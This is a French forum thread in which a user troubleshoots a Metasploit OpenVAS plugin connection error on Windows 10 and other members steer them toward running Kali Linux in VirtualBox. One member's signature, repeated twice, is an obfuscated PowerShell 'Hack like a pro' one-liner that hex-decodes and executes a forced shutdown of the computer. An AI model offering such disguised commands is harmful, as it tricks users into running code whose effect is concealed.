Annonce

Réduire
Aucune annonce.

Problème avec openvas_connect

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Problème avec openvas_connect

    Dans metasploit je load openvas je tente de me connecter puis :

    openvas_connect test test localhost 9390 ok[*] Connecting to OpenVAS instance at localhost:9390 with username test...
    [-] Error while running command openvas_connect: uninitialized constant OpenVASOMP::OMPConnectionError

    Call stack:
    C:/metasploit-framework/embedded/framework/plugins/openvas.rb:195:in `rescue in cmd_openvas_connect'
    C:/metasploit-framework/embedded/framework/plugins/openvas.rb:189:in `cmd_openvas_connect'
    C:/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
    C:/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
    C:/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
    C:/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
    C:/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:208:in `run'
    C:/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:48:in `start'
    C:/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in `start'
    C:/metasploit-framework/bin/../embedded/framework/msfconsole:49:in `<main>'

    En cherchant je trouve rien à propos de MON erreur pourtant sa devrait être bon et je suis sous windows 10 pour info si une âme charitable vient m'aider
    ps:je sais pas si je post dans le bon endroit soyez indulgent premier post
    Dernière modification par xX_181423114_Xx, 15 avril 2018, 13h04.

  • #2
    Salut,

    Une petite recherche à ce sujet semble suggérer que le port (ici 9390) n'est pas le bon ou n'est pas accessible. Regarde ce que donne netstat -a (voire netstat -ab en administrateur). Si OpenVAS écoute bien sur TCP 9390, désactive tout ce qui est pare-feu, antivirus ou autre machin de protection pour faire un essai.

    Commentaire


    • #3
      rien en 9390 en tcp

      Commentaire


      • #4
        Si il n'est pas inscrit le port 9390 il faut que je l'ouvre manuellement non ?

        Commentaire


        • #5
          Ca fonctionne sous windows OpenVAS ?
          Hack like a pro :
          PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

          Commentaire


          • #6
            avec metasploit devrait pas avoir de soucis

            Commentaire


            • #7
              Je pense que Krisscool a raison. Ce doit être cela le problème. D'après ce tuto, il faut d'abord installer OpenVAS. Or, OpenVAS ne semble pas disposer de version pour Windows. En revanche, il est possible d'utiliser une machine virtuelle Linux toute prête. Ce qui implique l'installation préalable d'un logiciel de virtualisation comme VirtualBox.

              Bref, si c'est bien cela, il te reste encore du pain sur la planche mais rien d'insurmontable.

              Tu peux également voir la chose autrement et profiter de VirtualBox pour installer une machine KaliLinux (il y a une version toute faite pour VirtualBox). Auquel cas, tu auras tout de préinstallé : metasploit + OpenVAS.

              Commentaire


              • #8
                J'ai déjà avant d'utiliser VirtualBox mais il propose que des versions 32-bits (dans le bios je ne peux pas activer la virtualisation pourtant mon proccesseur le peut )

                Commentaire


                • #9
                  Après vérification avec un logiciel la virtualisation est bel et bien activée et supportée

                  Commentaire


                  • #10
                    En utilisant le code source de openvas je peux pas faire un installeur ?

                    Commentaire


                    • #11
                      Tu veux faire une porta windows ? xD Je pense que c'est pas le moyen le plus simple de résoudre ton problème ().

                      Franchement, passe par une kali virtualisée et planche plutôt sur ton souci de virtualisation. C'est (de loin) la manière la plus rapide et simple pour toi d'avoir des résultats.
                      Hack like a pro :
                      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                      Commentaire


                      • #12
                        Je suppose que tu es une réapparition de Daren ?

                        Première chose et ne le prend pas mal : fais un effort pour décrire ton problème. Je ne parle pas de faute d'orthographe mais juste que les phrases aient un sens et qu'elles situent au mieux le souci. Et de préférence, un message avec trois phrases plutôt que trois messages avec une phrase.

                        Donc, bien sûr, oublie le portage sous Windows. Il ne suffit pas de taper une ligne de commande pour ça, sinon ce serait déjà fait.

                        Concentre-toi sur ton problème d'installation de Kali Linux et précise exactement ce dont tu disposes (quelle VM, téléchargée où...) et bien sûr ce qui foire. Et là, les gens ici pourront efficacement t'aider.

                        Comme je te l'avais déjà dit, l'extension VT-x du processeur, on s'en tape. VirtualBox marche avec ou sans. C'est juste que sans, il ne peut pas faire tourner des OS 64 bits. Donc, au pire, tu prends une version 32 bits et tu vas y arriver. C'est très simple à faire.

                        Commentaire


                        • #13
                          Je vais essayer de faire claire pour VM :

                          -Je lance VM normalement , je créer une nouvelle machine mais pas de 64 bits , je créer un disque virtuelle.
                          -Je lance la machine puis une erreur me disant que je n'ai pas la virtualisation et que certain OS nécessite cette technologie pour fonctionner(mais je peux continuer)
                          - La première chose que je vois c'est : FATAL: No bootable medium found! system halted. (écrit comme si on était dans cmd et ça le fait pour chaque os )

                          *Désolé pour les 3 messages d'un coup je faisais des recherches en simultané
                          Dernière modification par xX_181423114_Xx, 17 avril 2018, 07h50.

                          Commentaire


                          • #14
                            Après avoir télécharger une machine kali linux 32 bits tout prête et l'avoir installée avec VM , une erreur me dis : (traduit) AMD-V n'est pas activer dans le bios ou dans l'OS.
                            Problème je n'ai aucune option dans le bios (ne me demander pas de chercher il y a pas plus de 4 options par page et il n'y a que 4 page)

                            Commentaire


                            • #15
                              Je viens de faire le test et effectivement Kali Linux 32 bits (en version machine virtuelle toute faite) ne marche pas sans le VT-x activé ; même après avoir essayé pas mal d'options.

                              C'est particulier car Windows XP et 7 32 bits fonctionnent très bien sans VT-x.

                              Donc voilà les options qu'il te reste :

                              - Donner les références exactes de ta machine (ou de ta carte mère) afin qu'on puisse chercher si VT-x est vraiment inactivable (à titre d'information, j'ai mis un bon moment avant de trouver où c'était dans mon PC précèdent, le nom n'avait rien à voir).
                              - Te procurer un autre PC et installer directement Kali.
                              - Éventuellement, installer Kali en dual boot sur ton PC.

                              Commentaire

                              Chargement...
                              X